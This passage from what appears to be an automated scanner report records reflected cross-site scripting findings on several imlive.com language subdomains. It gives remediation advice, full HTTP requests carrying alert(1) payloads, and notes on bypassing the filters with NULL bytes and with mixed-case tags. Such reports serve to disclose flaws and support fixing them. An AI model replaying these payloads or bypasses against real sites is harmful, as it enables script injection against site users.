<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
Set-Cookie: spvdr=vd=ca385023-6a55-4da9-9adc-27df877ab4ee&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 21515
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00ba898"><script>alert(1)</script>ea1f44e02c1~1');return false;">
...[SNIP]...

2.166. http://ru.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=ru.imlive.com&ul=/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://ru.imlive.com:80/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a76d7abf-e00b-41da-8545-88bfbdcb7dc0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 19198
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;">
...[SNIP]...

2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 18822
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/?955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&iy=dallas&id=44&iu=1&vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.169. http://se.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:34 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=se.imlive.com&ul=/waccess/50044'onerror='alert(1)'c69d85712e5/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://se.imlive.com:80/waccess/50044'onerror='alert(1)'c69d85712e5/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
Set-Cookie: spvdr=vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 19276
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
Set-Cookie: spvdr=vd=73be72ba-f032-4534-9729-f91765d9dbef&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:33 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 19702
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||d4282"><script>alert(1)</script>18266d653ee~1');return false;">
...[SNIP]...

2.172. http://ar.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: spvdr=vd=4e3caa11-2c53-455d-aeb6-23456dfa827b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:47 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:46 GMT
Connection: close
Content-Length: 18423
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=9e41c'-alert(1)-'966bdb815ef&iy=dallas&id=44&iu=1&vd=4e3caa11-2c53-455d-aeb6-23456dfa827b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.173. http://ar.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: spvdr=vd=567a60ee-ed7f-4de5-bea0-26314350146c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 20847
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=ar.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=803bf'-alert(1)-'0a99d8be53c&iy=dallas&id=44&iu=1&vd=567a60ee-ed7f-4de5-bea0-26314350146c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.174. http://br.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
Set-Cookie: spvdr=vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 18277
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=27acf'-alert(1)-'861f82f4c0a&iy=dallas&id=44&iu=1&vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.175. http://br.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
